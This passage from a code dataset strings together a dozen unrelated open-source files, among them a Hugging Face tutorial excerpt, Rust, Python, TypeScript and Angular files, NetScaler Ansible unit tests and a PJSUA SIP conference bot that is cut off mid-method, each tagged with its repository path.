2. トレーニング引数を、モデル、データセット、トークナイザー、データ照合器、および `compute_metrics` 関数とともに [`Trainer`] に渡します。
3. [`~Trainer.train`] を呼び出してモデルを微調整します。
```py
>>> training_args = TrainingArguments(
... output_dir="my_awesome_food_model",
... remove_unused_columns=False,
... eval_strategy="epoch",
... save_strategy="epoch",
... learning_rate=5e-5,
... per_device_train_batch_size=16,
... gradient_accumulation_steps=4,
... per_device_eval_batch_size=16,
... num_train_epochs=3,
... warmup_steps=0.1,
... logging_steps=10,
... load_best_model_at_end=True,
... metric_for_best_model="accuracy",
... push_to_hub=True,
... )
>>> trainer = Trainer(
... model=model,
... args=training_args,
... data_collator=data_collator,
... train_dataset=food["train"],
... eval_dataset=food["test"],
... processing_class=image_processor,
... compute_metrics=compute_metrics,
... )
>>> trainer.train()
```
トレーニングが完了したら、 [`~transformers.Trainer.push_to_hub`] メソッドを使用してモデルをハブに共有し、誰もがモデルを使用できるようにします。
```py
>>> trainer.push_to_hub()
```
<Tip>
画像分類用のモデルを微調整する方法の詳細な例については、対応する [PyTorch ノートブック](https://colab.research.google.com/github/huggingface/notebooks/blob/main/examples/image_classification.ipynb)
</Tip>
## Inference
モデルを微調整したので、それを推論に使用できるようになりました。
推論を実行したい画像を読み込みます。
```py
>>> ds = load_dataset("ethz/food101", split="validation[:10]")
>>> image = ds["image"][0]
```
<div class="flex justify-center">
<img src="https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png" alt="image of beignets"/>
</div>
推論用に微調整されたモデルを試す最も簡単な方法は、それを [`pipeline`] で使用することです。モデルを使用して画像分類用の`pipeline`をインスタンス化し、それに画像を渡します。
```py
>>> from transformers import pipeline
>>> classifier = pipeline("image-classification", model="my_awesome_food_model")
>>> classifier(image)
[{'score': 0.31856709718704224, 'label': 'beignets'},
{'score': 0.015232225880026817, 'label': 'bruschetta'},
{'score': 0.01519392803311348, 'label': 'chicken_wings'},
{'score': 0.013022331520915031, 'label': 'pork_chop'},
{'score': 0.012728818692266941, 'label': 'prime_rib'}]
```
必要に応じて、`pipeline`の結果を手動で複製することもできます。
画像プロセッサをロードして画像を前処理し、`input`を PyTorch テンソルとして返します。
```py
>>> from transformers import AutoImageProcessor
>>> import torch
>>> image_processor = AutoImageProcessor.from_pretrained("my_awesome_food_model")
>>> inputs = image_processor(image, return_tensors="pt")
```
入力をモデルに渡し、ロジットを返します。
```py
>>> from transformers import AutoModelForImageClassification
>>> model = AutoModelForImageClassification.from_pretrained("my_awesome_food_model")
>>> with torch.no_grad():
... logits = model(**inputs).logits
```
最も高い確率で予測されたラベルを取得し、モデルの `id2label` マッピングを使用してラベルに変換します。
```py
>>> predicted_label = logits.argmax(-1).item()
>>> model.config.id2label[predicted_label]
'beignets'
``` | unknown | github | https://github.com/huggingface/transformers | docs/source/ja/tasks/image_classification.md |
// Some combinations of features may not use these constants.
#![cfg_attr(not(feature = "full"), allow(dead_code))]
/// Error string explaining that the Tokio context hasn't been instantiated.
pub(crate) const CONTEXT_MISSING_ERROR: &str =
"there is no reactor running, must be called from the context of a Tokio 1.x runtime";
/// Error string explaining that the Tokio context is shutting down and cannot drive timers.
pub(crate) const RUNTIME_SHUTTING_DOWN_ERROR: &str =
"A Tokio 1.x context was found, but it is being shutdown.";
/// Error string explaining that the Tokio context is not available because the
/// thread-local storing it has been destroyed. This usually only happens during
/// destructors of other thread-locals.
pub(crate) const THREAD_LOCAL_DESTROYED_ERROR: &str =
"The Tokio context thread-local variable has been destroyed."; | rust | github | https://github.com/tokio-rs/tokio | tokio/src/util/error.rs |
import unittest
import fib
class Testing(unittest.TestCase):
def test_testing(self):
self.assertEqual(1,1, "Of course it does!")
class Fib_(unittest.TestCase):
def setUp(self):
self.fib = fib.fib2
def basecase_num_1(self):
self.assertEqual(self.fib(1), 0, "fib num 1 is not correct")
def basecase_num_2(self):
self.assertEqual(self.fib(2), 1, "fib num 2 is not correct")
def fib_num_10(self):
self.assertEqual(self.fib(10), 34, "fib 10 is 33")
def basecase_list_1(self):
self.assertEqual(self.fib(1), [0], "fib list with one item is not correct")
def basecase_list_2(self):
self.assertEqual(self.fib(2), [0,1], "fib list 2 with two items is not correct")
def fib_list_10(self):
self.assertEqual(self.fib(10), [0,1,1,2,3,5,8,13,21,34],
"Fib list ten is not correct")
class Fib1_testing(Fib_):
def setUp(self):
self.fib = fib.fib1
def test_basecase_1(self):
self.basecase_list_1()
def test_basecase_2(self):
self.basecase_list_2()
def test_fib_list_10(self):
self.fib_list_10()
class Fib2_testing(Fib_):
def setUp(self):
self.fib = fib.fib2
def test_basecase_1(self):
self.basecase_num_1()
def test_basecase_2(self):
self.basecase_num_2()
def test_fib_num_10(self):
self.fib_num_10()
class Fib_yield_list(Fib1_testing):
def setUp(self):
self.fib = fib.fib_list
class Fib_yield_num(Fib2_testing):
def setUp(self):
self.fib = fib.nth_fib_num
if __name__ == "__main__":
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
<!-- #docregion control-binding -->
<label for="name">Name: </label>
<input id="name" type="text" [formControl]="name" />
<!-- #enddocregion control-binding -->
<!-- #docregion display-value -->
<p>Value: {{ name.value }}</p>
<!-- #enddocregion display-value -->
<!-- #docregion update-value -->
<button type="button" (click)="updateName()">Update Name</button>
<!-- #enddocregion update-value --> | html | github | https://github.com/angular/angular | adev/src/content/examples/reactive-forms/src/app/name-editor/name-editor.component.html |
{
"compilerOptions": {
"incremental": true,
"target": "es5",
"lib": ["dom", "dom.iterable", "esnext"],
"allowJs": true,
"skipLibCheck": true,
"strict": true,
"forceConsistentCasingInFileNames": true,
"noEmit": true,
"esModuleInterop": true,
"module": "esnext",
"moduleResolution": "node",
"resolveJsonModule": true,
"isolatedModules": true,
"jsx": "react-jsx"
},
"include": ["next-env.d.ts", "**/*.ts", "**/*.tsx"],
"exclude": ["node_modules"]
} | json | github | https://github.com/vercel/next.js | examples/with-react-intl/tsconfig.json |
#!/usr/bin/env python2
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import hashlib
import sys
import os
from random import SystemRandom
import base64
import hmac
if len(sys.argv) < 2:
sys.stderr.write('Please include username as an argument.\n')
sys.exit(0)
username = sys.argv[1]
#This uses os.urandom() underneath
cryptogen = SystemRandom()
#Create 16 byte hex salt
salt_sequence = [cryptogen.randrange(256) for i in range(16)]
hexseq = list(map(hex, salt_sequence))
salt = "".join([x[2:] for x in hexseq])
#Create 32 byte b64 password
password = base64.urlsafe_b64encode(os.urandom(32))
digestmod = hashlib.sha256
if sys.version_info.major >= 3:
password = password.decode('utf-8')
digestmod = 'SHA256'
m = hmac.new(bytearray(salt, 'utf-8'), bytearray(password, 'utf-8'), digestmod)
result = m.hexdigest()
print("String to be appended to bitcoingold.conf:")
print("rpcauth="+username+":"+salt+"$"+result)
print("Your password:\n"+password) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import sys
def warn(msg):
print('[powerline-bash] ', msg)
class Powerline:
symbols = {
'compatible': {
'lock': 'RO',
'network': 'SSH',
'separator': u'\u25B6',
'separator_thin': u'\u276F'
},
'patched': {
'lock': u'\uE0A2',
'network': u'\uE0A2',
'separator': u'\uE0B0',
'separator_thin': u'\uE0B1'
},
'flat': {
'lock': '',
'network': '',
'separator': '',
'separator_thin': ''
},
}
color_templates = {
'bash': '\\[\\e%s\\]',
'zsh': '%%{%s%%}',
'bare': '%s',
}
def __init__(self, args, cwd):
self.args = args
self.cwd = cwd
mode, shell = args.mode, args.shell
self.color_template = self.color_templates[shell]
self.reset = self.color_template % '[0m'
self.lock = Powerline.symbols[mode]['lock']
self.network = Powerline.symbols[mode]['network']
self.separator = Powerline.symbols[mode]['separator']
self.separator_thin = Powerline.symbols[mode]['separator_thin']
self.segments = []
def color(self, prefix, code):
if code is None:
return ''
else:
return self.color_template % ('[%s;5;%sm' % (prefix, code))
def fgcolor(self, code):
return self.color('38', code)
def bgcolor(self, code):
return self.color('48', code)
def append(self, content, fg, bg, separator=None, separator_fg=None):
self.segments.append((content, fg, bg,
separator if separator is not None else self.separator,
separator_fg if separator_fg is not None else bg))
def draw(self):
return (''.join(self.draw_segment(i) for i in range(len(self.segments)))
+ self.reset).encode('utf-8') + ' '
def draw_segment(self, idx):
segment = self.segments[idx]
next_segment = self.segments[idx + 1] if idx < len(self.segments)-1 else None
return ''.join((
self.fgcolor(segment[1]),
self.bgcolor(segment[2]),
segment[0],
self.bgcolor(next_segment[2]) if next_segment else self.reset,
self.fgcolor(segment[4]),
segment[3]))
def get_valid_cwd():
""" We check if the current working directory is valid or not. Typically
happens when you checkout a different branch on git that doesn't have
this directory.
We return the original cwd because the shell still considers that to be
the working directory, so returning our guess will confuse people
"""
# Prefer the PWD environment variable. Python's os.getcwd function follows
# symbolic links, which is undesirable. But if PWD is not set then fall
# back to this func
try:
cwd = os.getenv('PWD') or os.getcwd()
except:
warn("Your current directory is invalid. If you open a ticket at " +
"https://github.com/milkbikis/powerline-shell/issues/new " +
"we would love to help fix the issue.")
sys.stdout.write("> ")
sys.exit(1)
parts = cwd.split(os.sep)
up = cwd
while parts and not os.path.exists(up):
parts.pop()
up = os.sep.join(parts)
if cwd != up:
warn("Your current directory is invalid. Lowest valid directory: "
+ up)
return cwd
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--cwd-mode', action='store',
help='How to display the current directory', default='fancy',
choices=['fancy', 'plain', 'dironly'])
arg_parser.add_argument('--cwd-only', action='store_true',
help='Deprecated. Use --cwd-mode=dironly')
arg_parser.add_argument('--cwd-max-depth', action='store', type=int,
default=5, help='Maximum number of directories to show in path')
arg_parser.add_argument('--cwd-max-dir-size', action='store', type=int,
help='Maximum number of letters displayed for each directory in the path')
arg_parser.add_argument('--colorize-hostname', action='store_true',
help='Colorize the hostname based on a hash of itself.')
arg_parser.add_argument('--mode', action='store', default='patched',
help='The characters used to make separators between segments',
choices=['patched', 'compatible', 'flat'])
arg_parser.add_argument('--shell', action='store', default='bash',
help='Set this to your shell type', choices=['bash', 'zsh', 'bare'])
arg_parser.add_argument('prev_error', nargs='?', type=int, default=0,
help='Error code returned by the last command')
args = arg_parser.parse_args()
powerline = Powerline(args, get_valid_cwd()) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# Copyright 2015 The QingYuan Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import httplib
import json
import time
class Registrator:
def __init__(self):
self.ds ={
"creationTimestamp": "",
"kind": "Minion",
"name": "", # private_address
"metadata": {
"name": "", #private_address,
},
"spec": {
"externalID": "", #private_address
"capacity": {
"mem": "", # mem + ' K',
"cpu": "", # cpus
}
},
"status": {
"conditions": [],
"hostIP": "", #private_address
}
}
@property
def data(self):
''' Returns a data-structure for population to make a request. '''
return self.ds
def register(self, hostname, port, api_path):
''' Contact the API Server for a new registration '''
headers = {"Content-type": "application/json",
"Accept": "application/json"}
connection = httplib.HTTPConnection(hostname, port)
print 'CONN {}'.format(connection)
connection.request("POST", api_path, json.dumps(self.data), headers)
response = connection.getresponse()
body = response.read()
print(body)
result = json.loads(body)
print("Response status:%s reason:%s body:%s" % \
(response.status, response.reason, result))
return response, result
def update(self):
''' Contact the API Server to update a registration '''
# do a get on the API for the node
# repost to the API with any modified data
pass
def save(self):
''' Marshall the registration data '''
# TODO
pass
def command_succeeded(self, response, result):
''' Evaluate response data to determine if the command was successful '''
if response.status in [200, 201]:
print("Registered")
return True
elif response.status in [409,]:
print("Status Conflict")
# Suggested return a PUT instead of a POST with this response
# code, this predicates use of the UPDATE method
# TODO
elif response.status in (500,) and result.get(
'message', '').startswith('The requested resource does not exist'):
# There's something fishy in the qing api here (0.4 dev), first time we
# go to register a new minion, we always seem to get this error.
# https://github.com/qingyuancloud/QingYuan/issues/1995
time.sleep(1)
print("Retrying registration...")
raise ValueError("Registration returned 500, retry")
# return register_machine(apiserver, retry=True)
else:
print("Registration error")
# TODO - get request data
raise RuntimeError("Unable to register machine with") | unknown | codeparrot/codeparrot-clean | ||
//// [tests/cases/conformance/async/es5/functionDeclarations/asyncFunctionDeclaration3_es5.ts] ////
//// [asyncFunctionDeclaration3_es5.ts]
function f(await = await) {
}
//// [asyncFunctionDeclaration3_es5.js]
"use strict";
function f(await) {
if (await === void 0) { await = await; }
} | javascript | github | https://github.com/microsoft/TypeScript | tests/baselines/reference/asyncFunctionDeclaration3_es5(target=es5).js |
# Copyright (c) 2017 Citrix Systems
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from ansible.compat.tests.mock import patch, Mock, MagicMock, call
import sys
if sys.version_info[:2] != (2, 6):
import requests
from units.modules.utils import set_module_args
from .netscaler_module import TestModule, nitro_base_patcher
class TestNetscalerServiceModule(TestModule):
@classmethod
def setUpClass(cls):
m = MagicMock()
cls.service_mock = MagicMock()
cls.service_mock.__class__ = MagicMock()
cls.service_lbmonitor_binding_mock = MagicMock()
cls.lbmonitor_service_binding_mock = MagicMock()
nssrc_modules_mock = {
'nssrc.com.citrix.netscaler.nitro.resource.config.basic': m,
'nssrc.com.citrix.netscaler.nitro.resource.config.basic.service': m,
'nssrc.com.citrix.netscaler.nitro.resource.config.basic.service.service': cls.service_mock,
'nssrc.com.citrix.netscaler.nitro.resource.config.basic.service_lbmonitor_binding': cls.service_lbmonitor_binding_mock,
'nssrc.com.citrix.netscaler.nitro.resource.config.basic.service_lbmonitor_binding.service_lbmonitor_binding': m,
'nssrc.com.citrix.netscaler.nitro.resource.config.lb': m,
'nssrc.com.citrix.netscaler.nitro.resource.config.lb.lbmonitor_service_binding': m,
'nssrc.com.citrix.netscaler.nitro.resource.config.lb.lbmonitor_service_binding.lbmonitor_service_binding': cls.lbmonitor_service_binding_mock,
}
cls.nitro_specific_patcher = patch.dict(sys.modules, nssrc_modules_mock)
cls.nitro_base_patcher = nitro_base_patcher
@classmethod
def tearDownClass(cls):
cls.nitro_base_patcher.stop()
cls.nitro_specific_patcher.stop()
def set_module_state(self, state):
set_module_args(dict(
nitro_user='user',
nitro_pass='pass',
nsip='1.1.1.1',
state=state,
))
def setUp(self):
super(TestNetscalerServiceModule, self).setUp()
self.nitro_base_patcher.start()
self.nitro_specific_patcher.start()
# Setup minimal required arguments to pass AnsibleModule argument parsing
def tearDown(self):
super(TestNetscalerServiceModule, self).tearDown()
self.nitro_base_patcher.stop()
self.nitro_specific_patcher.stop()
def test_graceful_nitro_api_import_error(self):
# Stop nitro api patching to cause ImportError
self.set_module_state('present')
self.nitro_base_patcher.stop()
self.nitro_specific_patcher.stop()
from ansible.modules.network.netscaler import netscaler_service
self.module = netscaler_service
result = self.failed()
self.assertEqual(result['msg'], 'Could not load nitro python sdk')
def test_graceful_nitro_error_on_login(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
class MockException(Exception):
def __init__(self, *args, **kwargs):
self.errorcode = 0
self.message = ''
client_mock = Mock()
client_mock.login = Mock(side_effect=MockException)
m = Mock(return_value=client_mock)
with patch('ansible.modules.network.netscaler.netscaler_service.get_nitro_client', m):
with patch('ansible.modules.network.netscaler.netscaler_service.nitro_exception', MockException):
self.module = netscaler_service
result = self.failed()
self.assertTrue(result['msg'].startswith('nitro exception'), msg='nitro exception during login not handled properly')
def test_graceful_no_connection_error(self):
if sys.version_info[:2] == (2, 6):
self.skipTest('requests library not available under python2.6')
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
class MockException(Exception):
pass
client_mock = Mock()
attrs = {'login.side_effect': requests.exceptions.ConnectionError}
client_mock.configure_mock(**attrs)
m = Mock(return_value=client_mock)
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
get_nitro_client=m,
nitro_exception=MockException,
):
self.module = netscaler_service
result = self.failed()
self.assertTrue(result['msg'].startswith('Connection error'), msg='Connection error was not handled gracefully')
def test_graceful_login_error(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
if sys.version_info[:2] == (2, 6):
self.skipTest('requests library not available under python2.6')
class MockException(Exception):
pass
client_mock = Mock()
attrs = {'login.side_effect': requests.exceptions.SSLError}
client_mock.configure_mock(**attrs)
m = Mock(return_value=client_mock)
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
get_nitro_client=m,
nitro_exception=MockException,
):
self.module = netscaler_service
result = self.failed()
self.assertTrue(result['msg'].startswith('SSL Error'), msg='SSL Error was not handled gracefully')
def test_create_non_existing_service(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
service_exists_mock = Mock(side_effect=[False, True])
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
do_state_change=Mock(return_value=Mock(errorcode=0)),
):
self.module = netscaler_service
result = self.exited()
service_proxy_mock.assert_has_calls([call.add()])
self.assertTrue(result['changed'], msg='Change not recorded')
def test_update_service_when_service_differs(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
service_exists_mock = Mock(side_effect=[True, True])
service_identical_mock = Mock(side_effect=[False, True])
monitor_bindings_identical_mock = Mock(side_effect=[True, True])
all_identical_mock = Mock(side_effect=[False])
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
service_identical=service_identical_mock,
monitor_bindings_identical=monitor_bindings_identical_mock,
all_identical=all_identical_mock,
do_state_change=Mock(return_value=Mock(errorcode=0)),
):
self.module = netscaler_service
result = self.exited()
service_proxy_mock.assert_has_calls([call.update()])
self.assertTrue(result['changed'], msg='Change not recorded')
def test_update_service_when_monitor_bindings_differ(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
service_exists_mock = Mock(side_effect=[True, True])
service_identical_mock = Mock(side_effect=[True, True])
monitor_bindings_identical_mock = Mock(side_effect=[False, True])
all_identical_mock = Mock(side_effect=[False])
sync_monitor_bindings_mock = Mock()
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
service_identical=service_identical_mock,
monitor_bindings_identical=monitor_bindings_identical_mock,
all_identical=all_identical_mock,
sync_monitor_bindings=sync_monitor_bindings_mock,
do_state_change=Mock(return_value=Mock(errorcode=0)),
):
self.module = netscaler_service
result = self.exited()
# poor man's assert_called_once since python3.5 does not implement that mock method
self.assertEqual(len(sync_monitor_bindings_mock.mock_calls), 1, msg='sync monitor bindings not called once')
self.assertTrue(result['changed'], msg='Change not recorded')
def test_no_change_to_module_when_all_identical(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
service_exists_mock = Mock(side_effect=[True, True])
service_identical_mock = Mock(side_effect=[True, True])
monitor_bindings_identical_mock = Mock(side_effect=[True, True])
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
service_identical=service_identical_mock,
monitor_bindings_identical=monitor_bindings_identical_mock,
do_state_change=Mock(return_value=Mock(errorcode=0)),
):
self.module = netscaler_service
result = self.exited()
self.assertFalse(result['changed'], msg='Erroneous changed status update')
def test_absent_operation(self):
self.set_module_state('absent')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
service_exists_mock = Mock(side_effect=[True, False])
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
):
self.module = netscaler_service
result = self.exited()
service_proxy_mock.assert_has_calls([call.delete()])
self.assertTrue(result['changed'], msg='Changed status not set correctly')
def test_absent_operation_no_change(self):
self.set_module_state('absent')
from ansible.modules.network.netscaler import netscaler_service
service_proxy_mock = MagicMock()
attrs = {
'diff_object.return_value': {},
}
service_proxy_mock.configure_mock(**attrs)
m = MagicMock(return_value=service_proxy_mock)
service_exists_mock = Mock(side_effect=[False, False])
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
ConfigProxy=m,
service_exists=service_exists_mock,
):
self.module = netscaler_service
result = self.exited()
service_proxy_mock.assert_not_called()
self.assertFalse(result['changed'], msg='Changed status not set correctly')
def test_graceful_nitro_exception_operation_present(self):
self.set_module_state('present')
from ansible.modules.network.netscaler import netscaler_service
class MockException(Exception):
def __init__(self, *args, **kwargs):
self.errorcode = 0
self.message = ''
m = Mock(side_effect=MockException)
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
service_exists=m,
nitro_exception=MockException
):
self.module = netscaler_service
result = self.failed()
self.assertTrue(
result['msg'].startswith('nitro exception'),
msg='Nitro exception not caught on operation present'
)
def test_graceful_nitro_exception_operation_absent(self):
self.set_module_state('absent')
from ansible.modules.network.netscaler import netscaler_service
class MockException(Exception):
def __init__(self, *args, **kwargs):
self.errorcode = 0
self.message = ''
m = Mock(side_effect=MockException)
with patch.multiple(
'ansible.modules.network.netscaler.netscaler_service',
service_exists=m,
nitro_exception=MockException
):
self.module = netscaler_service
result = self.failed()
self.assertTrue(
result['msg'].startswith('nitro exception'),
msg='Nitro exception not caught on operation absent'
) | unknown | codeparrot/codeparrot-clean | ||
from __future__ import unicode_literals, division, absolute_import, print_function
import logging
from flexget import options, plugin
from flexget.event import event
from flexget.logger import console
log = logging.getLogger('try_regexp')
class PluginTryRegexp(object):
"""
This plugin allows user to test regexps for a task.
"""
def __init__(self):
self.abort = False
def matches(self, entry, regexp):
"""Return True if any of the entry string fields match given regexp"""
import re
for field, value in entry.iteritems():
if not isinstance(value, basestring):
continue
if re.search(regexp, value, re.IGNORECASE | re.UNICODE):
return (True, field)
return (False, None)
def on_task_filter(self, task, config):
if not task.options.try_regexp:
return
if self.abort:
return
console('-' * 79)
console('Hi there, welcome to try regexps in realtime!')
console('Press ^D or type \'exit\' to continue. Type \'continue\' to continue non-interactive execution.')
console('Task \'%s\' has %s entries, enter regexp to see what matches it.' % (task.name, len(task.entries)))
while (True):
try:
s = raw_input('--> ')
if s == 'exit':
break
if s == 'abort' or s == 'continue':
self.abort = True
break
except EOFError:
break
count = 0
for entry in task.entries:
try:
match, field = self.matches(entry, s)
if match:
console('Title: %-40s URL: %-30s From: %s' % (entry['title'], entry['url'], field))
count += 1
except:
console('Invalid regular expression')
break
console('%s of %s entries matched' % (count, len(task.entries)))
console('Bye!')
@event('plugin.register')
def register_plugin():
plugin.register(PluginTryRegexp, '--try-regexp', builtin=True, api_ver=2)
@event('options.register')
def register_parser_arguments():
options.get_parser('execute').add_argument('--try-regexp', action='store_true', dest='try_regexp', default=False,
help='try regular expressions interactively') | unknown | codeparrot/codeparrot-clean | ||
# $Id$
#
# SIP Conference Bot
#
# Copyright (C) 2008-2009 Teluu Inc. (http://www.teluu.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import pjsua as pj
import string
import sys
CFG_FILE = "config"
INFO = 1
TRACE = 2
# Call callback. This would just forward the event to the Member class
class CallCb(pj.CallCallback):
def __init__(self, member, call=None):
pj.CallCallback.__init__(self, call)
self.member = member
def on_state(self):
self.member.on_call_state(self.call)
def on_media_state(self):
self.member.on_call_media_state(self.call)
def on_dtmf_digit(self, digits):
self.member.on_call_dtmf_digit(self.call, digits)
def on_transfer_request(self, dst, code):
return self.member.on_call_transfer_request(self.call, dst, code)
def on_transfer_status(self, code, reason, final, cont):
return self.member.on_call_transfer_status(self.call, code, reason, final, cont)
def on_replace_request(self, code, reason):
return self.member.on_call_replace_request(self.call, code, reason)
def on_replaced(self, new_call):
self.member.on_call_replaced(self.call, new_call)
def on_typing(self, is_typing):
self.member.on_typing(is_typing, call=self.call)
def on_pager(self, mime_type, body):
self.member.on_pager(mime_type, body, call=self.call)
def on_pager_status(self, body, im_id, code, reason):
self.member.on_pager_status(body, im_id, code, reason, call=self.call)
# Buddy callback. This would just forward the event to Member class
class BuddyCb(pj.BuddyCallback):
def __init__(self, member, buddy=None):
pj.BuddyCallback.__init__(self, buddy)
self.member = member
def on_pager(self, mime_type, body):
self.member.on_pager(mime_type, body, buddy=self.buddy)
def on_pager_status(self, body, im_id, code, reason):
self.member.on_pager_status(body, im_id, code, reason, buddy=self.buddy)
def on_state(self):
self.member.on_pres_state(self.buddy)
def on_typing(self, is_typing):
self.member.on_typing(is_typing, buddy=self.buddy)
##############################################################################
#
#
# This class represents individual room member (either/both chat and voice conf)
#
#
class Member:
def __init__(self, bot, uri):
self.uri = uri
self.bot = bot
self.call = None
self.buddy = None
self.bi = pj.BuddyInfo()
self.in_chat = False
self.in_voice = False
self.im_error = False
self.html = False
def __str__(self):
str = string.ljust(self.uri, 30) + " -- "
if self.buddy:
bi = self.buddy.info()
str = str + bi.online_text
else:
str = str + "Offline"
str = str + " ["
if (self.in_voice):
str = str + " voice"
if (self.in_chat):
str = str + " chat"
if (self.html):
str = str + " html"
else:
str = str + " plain"
if (self.im_error):
str = str + " im_error"
str = str + "]"
return str
def join_call(self, call):
if self.call:
self.call.hangup(603, "You have been disconnected for making another call")
self.call = call
call.set_callback(CallCb(self, call))
msg = "%(uri)s is attempting to join the voice conference" % \
{'uri': self.uri}
self.bot.DEBUG(msg + "\n", INFO)
self.bot.broadcast_pager(None, msg)
def join_chat(self):
if not self.buddy:
self.bot.DEBUG(self.uri + " joining chatroom...\n", INFO)
self.buddy = self.bot.acc.add_buddy(self.uri)
self.buddy.set_callback(BuddyCb(self, self.buddy))
self.buddy.subscribe()
else:
self.bot.DEBUG(self.uri + " already in chatroom, resubscribing..\n", INFO)
self.buddy.subscribe()
def send_pager(self, body, mime="text/plain"):
self.bot.DEBUG("send_pager() to " + self.uri)
if self.in_chat and not self.im_error and self.buddy:
if self.html:
#This will make us receive html!
#mime = "text/html"
body = body.replace("<", "<")
body = body.replace(">", ">")
body = body.replace('"', """)
body = body.replace("\n", "<BR>\n")
self.buddy.send_pager(body, content_type=mime)
self.bot.DEBUG("..sent\n")
else:
self.bot.DEBUG("..not sent!\n")
def on_call_state(self, call):
ci = call.info()
if ci.state==pj.CallState.DISCONNECTED:
if self.in_voice:
msg = "%(uri)s has left the voice conference (%(1)d/%(2)s)" % \
{'uri': self.uri, '1': ci.last_code, '2': ci.last_reason}
self.bot.DEBUG(msg + "\n", INFO)
self.bot.broadcast_pager(None, msg)
self.in_voice = False
self.call = None
self.bot.on_member_left(self)
elif ci.state==pj.CallState.CONFIRMED:
msg = "%(uri)s has joined the voice conference" % \
{'uri': self.uri}
self.bot.DEBUG(msg + "\n", INFO)
self.bot.broadcast_pager(None, msg)
def on_call_media_state(self, call):
self.bot.DEBUG("Member.on_call_media_state\n")
ci = call.info()
if ci.conf_slot!=-1:
if not self.in_voice:
msg = self.uri + " call media is active"
self.bot.broadcast_pager(None, msg)
self.in_voice = True
self.bot.add_to_voice_conf(self)
else:
if self.in_voice:
msg = self.uri + " call media is inactive"
self.bot.broadcast_pager(None, msg)
self.in_voice = False
def on_call_dtmf_digit(self, call, digits):
msg = "%(uri)s sent DTMF digits %(dig)s" % \
{'uri': self.uri, 'dig': digits}
self.bot.broadcast_pager(None, msg)
def on_call_transfer_request(self, call, dst, code):
msg = "%(uri)s is transferring the call to %(dst)s" % \
{'uri': self.uri, 'dst': dst}
self.bot.broadcast_pager(None, msg)
return 202
def on_call_transfer_status(self, call, code, reason, final, cont):
msg = "%(uri)s call transfer status is %(code)d/%(res)s" % \
{'uri': self.uri, 'code': code, 'res': reason}
self.bot.broadcast_pager(None, msg)
return True
def on_call_replace_request(self, call, code, reason):
msg = "%(uri)s is requesting call replace" % \
{'uri': self.uri}
self.bot.broadcast_pager(None, msg)
return (code, reason)
def on_call_replaced(self, call, new_call):
msg = "%(uri)s call is replaced" % \
{'uri': self.uri}
self.bot.broadcast_pager(None, msg)
def on_pres_state(self, buddy):
old_bi = self.bi
self.bi = buddy.info()
